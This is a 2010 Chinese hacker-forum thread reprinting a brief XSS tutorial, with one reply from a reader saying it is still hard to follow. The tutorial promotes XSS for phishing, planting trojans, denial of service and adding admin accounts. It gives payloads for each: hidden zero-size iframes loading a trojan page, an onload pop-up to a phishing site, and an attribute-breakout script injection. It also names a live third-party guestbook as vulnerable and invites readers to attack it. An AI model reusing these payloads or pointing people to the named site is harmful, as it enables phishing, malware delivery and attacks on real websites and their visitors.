Board logo

标题: [转载]小谈XSS [打印本页]

作者: 冷酷鲨鱼    时间: 2010-4-18 19:58     标题: [转载]小谈XSS

华夏黑客联盟www.hxhack.com
作者:黑琴枝/kerling

也许有人会问,XXS是什么?
XXS就是通过URL 留言等方式使网站插入恶意代码
为了让大家了解更深刻,我去网上查了查,以下摘自互动百科:
引用
XSS总体介绍
什么是XSS攻击 ?
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性。而本文主要讲的是利用XSS得到目标服务器的shell。技术虽然是老技术,但是其思路希望对大家有帮助。

如何寻找XSS漏洞
就个人而言,我把XSS攻击分成两类,一类是来自内部的攻击,主要指的是利用程序自身的漏洞,构造跨站语句,如:dvbbs的showerror.asp存在的跨站漏洞。另一类则是来来自外部的攻击,主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。如当我们要渗透一个站点,我们自己构造一个有跨站漏洞的网页,然后构造跨站语句,通过结合其它技术,如社会工程学等,欺骗目标服务器的管理员打开。
然后利用下面的技术得到一个shell.
其实XSS能做到的就是调用文件 弹窗和
那么XSS有什么利用价值呢?
钓鱼,提权,拒绝服务攻击,iframe挂马等等运用iframe 完成钓鱼,拒绝服务攻击:挂马大家都很熟悉,引用
<iframe src=http://127.0.0.1/m.htm width=0 height=0></iframe>把M.HTM修改成自己的马就可以了,我主要讲钓鱼和拒绝服务假如某XX大型网站出现XXS跨站漏洞,允许执行<SCRIPT>内的语句,那么黑客就会构造引用
<iframe src=http://127.0.0.1/m.htm width=0 height=0></iframe>将其插入网站内,接下来,黑客还会在M.HTM中加入这样的语句 引用
<html><body onload="window.open('http://www.hxhack.com','example01','fullscreen');">;<b>www.hxhack.com</b></body></html>以上语句将会打开一个信窗口,如果是没有意识的网民在访问此网站时,弹出了www.HXHACK.COM 里面可以是我们的钓鱼网站代码因为大部分网民安全意识并不强,加上是大型网站弹出的窗口,也就可能成功的“钓鱼”了还是以上的情况,某XX著名网站允许执行iframe 假设其某张帖子每小时访问量为1000(只是假设) 那么我们加入引用
<iframe src=网站 width=0 height=0></iframe>大型网站一般都拥有强大的处理功能,对于一小时1000访问量轻而易举的解决,但是,如果是一使用空间的XX普通企业来说会怎么样? “崩溃”


XXS的提权:也许许多人对XXS的提权感觉到很陌生,接下来我就简单介绍一下这里所说的提权只是说在后台增加一个管理员,然后登入。。
接下来我们简单熟悉一下XSS代码
1,隐藏访问:<iframe src=www.hxhack.com width=0 height=0></iframe>
上面的代码会在页面内打开一个宽高为0的页面(下图中我将他修改成了500,为了让大家看得清楚)
此代码用处比较多,后面会讲到

2,弹窗代码:
<A href="http://www.hxhack.cn">华夏黑客联盟</a>
这是超连接的代码,一般编辑器的形式为<A href="URL">NAME</a>

我们将第一段的代码保存为2.htm
这就是一个简单的超连接,那么我们可以通过修改URL处,将其 闭合来达到跨站效果..
修改为"><script>alert('xss')</script><"
那么代码就变成了<A href=""><script>alert(Xss)</script><"">华夏黑客联盟</a>
执行了弹窗脚本,打开后大家看

3,JAVA脚本
许多图片均是使用<img>而IMG通常使用SRC来带入URL,我们在IE中输入javascript:alert('hxhack')结果如图
当然,还有很多,这里本人比较懒....
我们找一个XSS实例吧http://www.dl6688.cn/guestbook/index.asp
我先随便插入了一个图片

查看源代码
<p style="padding:4px;word-wrap: break-word">  
<a  rel=nofollow href="http://www.google.cn" target=_blank><IMG SRC="http://www.google.cn" border=0 alt=按此在新窗口浏览图片 onload="javascript:if(this.width>440)this.width=440"></a> </p>
</td>
  </tr>

很明显的,我划了线....
那么我们就可以尝试插入javascript:alert('xss by hxhack')

哈哈,成功了http://www.dl6688.cn/guestbook/index.asp
这里是地址,有兴趣的朋友可以去尝试,发掘出新的XSS

作者: 冷酷鲨鱼    时间: 2010-4-20 20:09

晕。还是看不懂。




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2